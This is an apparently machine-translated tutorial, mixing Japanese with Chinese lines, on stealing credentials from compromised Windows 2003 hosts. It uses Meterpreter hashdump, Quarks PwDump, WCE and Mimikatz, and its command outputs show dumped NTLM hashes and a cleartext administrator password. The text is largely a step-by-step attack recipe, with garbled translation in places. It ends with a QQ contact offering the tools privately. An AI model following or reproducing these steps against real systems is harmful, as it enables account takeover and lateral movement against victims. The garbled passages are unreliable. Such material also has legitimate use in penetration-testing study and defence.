序文
ここでキャプチャーされるシステムはすべて03システムです。
パスワードを取得するハッシュダンプ
ターゲットマシンからハッシュ値を抽出し、ハッシュ値をクラックしてアカウントパスワードを取得します。コンピューター内の各アカウント(ドメインサーバーの場合はドメイン内の各アカウント)のユーザー名とパスワードは、samファイルに格納されます。実行中、ファイルはすべてのアカウントをロックします。アクセスするには、システムレベルのアカウントが必要です。したがって、このコマンドを使用するには、特権を増やす必要があります
。シェルプロンプトでhashdumpコマンドを入力して、ターゲットマシンのsamデータベースにハッシュをエクスポートします
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1007:4274ebc980bc50aed4a6c053eb6761b1:326f3aae7bd9312f6b32afafec858d53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:ae694413fb708add0aa8b1b47358ce92:::
別のモジュールsmart_hashdumpはより強力で、ドメイン内のすべてのユーザーのハッシュをエクスポートできます。そのワークフローは次のとおりです。
- 检查meterpreter会话的权限和目标机操作系统类型
- 检查目标机是否为域控制服务器
- 首先尝试从注册机中读取hash不行再尝试注入LSASS进程
取得したハッシュは、暴力やレインボーテーブルで解読できます。http://www.cmd5.com/
Quarks PwDumpキャプチャパスワード
win32環境でシステム認証情報をエクスポートするためのツール。サポートされているオペレーティングシステムは、xp、03、win7、win8、2008などです。Windowsパスワードシステムでは、パスワードは暗号化されたsamファイルに保存され、アカウントはログインします。パスワードの暗号文と平文はシステムのメモリに保存され、通常の状態では読み取ることができませんが、Qpでは読み取ることができます。
直接运行Quarks PwDump.exe
-dhl:导出本地哈希值
-dhdc:导出内存中的域控哈希值
-dhd:导出域控哈希值,必须指定NTDS文件
-db:导出Bitlocker信息,必须指定NTDS文件
-nt:导出NTDS文件
-hist:导出历史信息,可选项
-t:可选导出类型,默认导出JOhn类型
-o:导出文件到本地
ここで、このツールを使用してハッシュ値を取得してエクスポートします。ローカルハッシュ値を現在のディレクトリの1.txtにエクスポートするコマンドを入力できます
QuarksPwDump.exe --dump-hash-local --output 1.txt
Windows資格情報エディターのグラブパスワード
Windows資格情報エディター(WCE)は、強力なWindowsプラットフォームイントラネット侵入ツールであり、ログインセッションを列挙し、関連する資格情報(LM / NTHashなど)を追加、変更、削除できます。これらの関数は、イントラネット浸透で使用できます。たとえば、Windowsプラットフォームでのハッシュ操作を回避したり、メモリからNT / LMハッシュを取得したり(インタラクティブログイン、サービス、リモートデスクトップ接続からも利用可能)さらなる攻撃は、サイズも非常に小さく、イントラネットへの侵入に不可欠なツールです。ただし、管理者権限で使用する必要があり、ウイルス対策ツールに注意を払う必要があります。
まずアップロードコマンドを入力してwce.exeをターゲットホストのCドライブにアップロードし、次にターゲットマシンのシェルの下でwce-wコマンドを入力すると、システム管理者のパスワードが正常に抽出されます。
meterpreter > upload /root/wce.exe C:\Documents and Settings\Administrator\桌面\wce_v1_3beta>
デフォルトの使用-|コマンドでデータ形式を読み取るusername:domain:Im:ntlm(この種類の読み取りは、samデータベースの情報を読み取るのではなく、メモリからログイン情報を読み取ることです)、デフォルトの読み取り方法が最初です安全な方法で読み取り、読み取りに失敗した場合は安全でない方法を使用してください。システムに損傷を与える可能性があります。安全な読み取り方法を強制するには、-fパラメータを使用することをお勧めします。-gパラメーターは、パスワードを計算するために使用されます。これは、システムが暗号文を計算するために使用する暗号化方式を定式化するためです。-cパラメーターは、cmdを実行するセッションを指定するために使用され、-vパラメーターは、詳細情報を表示するために使用されるため、luid情報を表示できます。 、-Wパラメータは最も重要であり、ログインしたクリアテキストのパスワードを表示するために使用されます
-c参数用于指定会话来执行cmd
-v参数用于显示详细信息
-w用于查看已经登陆的明文密码
-l读取从内存中已经登陆的信息
-f强制使用安全的方式读取
-g用来计算密码
Mimikatzキャプチャパスワード
Mimikatzは、フランスの専門家Benjamin Delpy(@gentilkiwi)によって作成された軽量デバッガです。侵入後のテストツールとして、セキュリティテスターがシステムパスワードを簡単に取得できるようにします。また、バイパスするために取得できるKerberosログイン資格情報も含まれていますこれは、RestrictedAdminモードのWindows 8またはWindows Server 2012のリモートターミナル(RDP)などの機能をサポートします。初期の侵入段階の後、ほとんどの場合、攻撃者はコンピュータ/ネットワークでより強固な足場を築きたいと思うかもしれません。そのためには、通常、一連の補足ツールが必要です。Mimikatzは、便利なタスクを一緒にバンドルしてみてください。このツールは、Windows 2000およびWindows XPシステムでは使用できません。Metasploitは、ユーザーがターゲットホストにソフトウェアをアップロードせずに使用できるMeterpreterスクリプトとして統合しています。Mimikatzは管理者権限で使用する必要があります。現時点では、一連の事前侵入を通じてターゲットマシンのMeterpreterシェルを正常に取得できたと想定します。
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
SYSTEM権限を取得したら、最初にターゲットマシンのアーキテクチャを確認します。Mimikatzは32ビットと64ビットの両方のWindowsアーキテクチャをサポートしていますが、サーバーが64ビットオペレーティングシステムの場合、Mimikatzを直接使用した後、Meterpreterはデフォルトで32ビットバージョンのMimikatzをメモリに読み込みます。これにより、64ビットオペレーティングシステムで多くの機能が無効になります。最初にシステムプロセスリストを表示してから、プロセスを64ビットプログラムプロセスに移行してから、Mimikatzを読み込んでシステムパスワードのプレーンテキストを表示する必要があります。32ビットオペレーティングシステムでは、このような制限はありません。ここにsysinfoコマンドを入力します
meterpreter > sysinfo
Computer : WWW
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
mimikatzを直接ロードしてヘルプを表示
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > help mimikatz
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds.
livessp Attempt to retrieve livessp creds.
mimikatz_command Run a custom command.
msv Attempt to retrieve msv creds (hashes).
ssp Attempt to retrieve ssp creds.
tspkg Attempt to retrieve tspkg creds.
wdigest Attempt to retrieve wdigest creds.
mimikatzコマンドオプションを使用すると、Mimikatzのすべての機能を使用できます。使用可能なモジュールの完全なリストを取得するには、間違ったモジュールをロードする必要があります。
meterpreter > mimikatz_command -f a::
Module : 'a' introuvable
Modules disponibles :
- Standard
crypto - Cryptographie et certificats
hash - Hash
system - Gestion syst�me
process - Manipulation des processus
thread - Manipulation des threads
service - Manipulation des services
privilege - Manipulation des privil�ges
handle - Manipulation des handles
impersonate - Manipulation tokens d'acc�s
winmine - Manipulation du d�mineur
minesweeper - Manipulation du d�mineur 7
nogpo - Anti-gpo et patchs divers
samdump - Dump de SAM
inject - Injecteur de librairies
ts - Terminal Server
divers - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
sekurlsa - Dump des sessions courantes par providers LSASS
efs - Manipulations EFS
「:」構文を使用して、特定のモジュールで使用可能なオプションを要求できます。モジュールを選択した後、「:」を使用してこのモジュールのヘルプを表示することもできます。たとえば、ハッシュを表示するために使用可能なオプションは、Imおよびntlmです。
meterpreter > mimikatz_command -f hash::
Module : 'hash' identifi�, mais commande '' introuvable
Description du module : Hash
lm - Hash LanManager (LM) d'une cha�ne de caract�res
ntlm - Hash NT LanManger (NTLM) d'une cha�ne de caract�res
Mimikatzの一般的な使用法を理解した後、Metasploitの組み込みコマンドを使用するか、Mimikatzの組み込みコマンドを使用して、ターゲットマシンからハッシュとプレーンテキストの証明書をエクスポートできます。次に、msvコマンドを直接入力して、システムハッシュ値を取得します。
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;202037 NTLM WWW Administrator lm{
44efce164ab921caaad3b435b51404ee }, ntlm{
32ed87bdb5fdc5e9cba88547376818d4 }
0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{
aad3b435b51404eeaad3b435b51404ee }, ntlm{
31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;53201 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP WWW$ n.s. (Credentials KO)
kerberosコマンドを入力してシステムチケットを取得する
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;53201 NTLM
0;999 NTLM WORKGROUP WWW$
0;202037 NTLM WWW Administrator 123456
wdigestコマンドを入力して、システムアカウント情報を取得します
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;53201 NTLM
0;999 NTLM WORKGROUP WWW$
0;202037 NTLM WWW Administrator 123456
次に、samdumpコマンドを入力してsamdumpの使用可能なオプションを表示し、次にmimikatz_command -f samdump :: hashesコマンドを入力してハッシュを取得します。
mimikatz_command -f samdump::
ハッシュを取得することに加えて、Mimikatzには、ハンドルモジュールの使用、リスト/キルプロセス、ユーザートークンのシミュレーションなど、他の多くの機能があります。
ここにツールが必要です
シンプルで充実した1日です。ツールが必要な人は、私を追加したり、プライベートにチャットしたりできます。
QQ:3075999532
公開番号: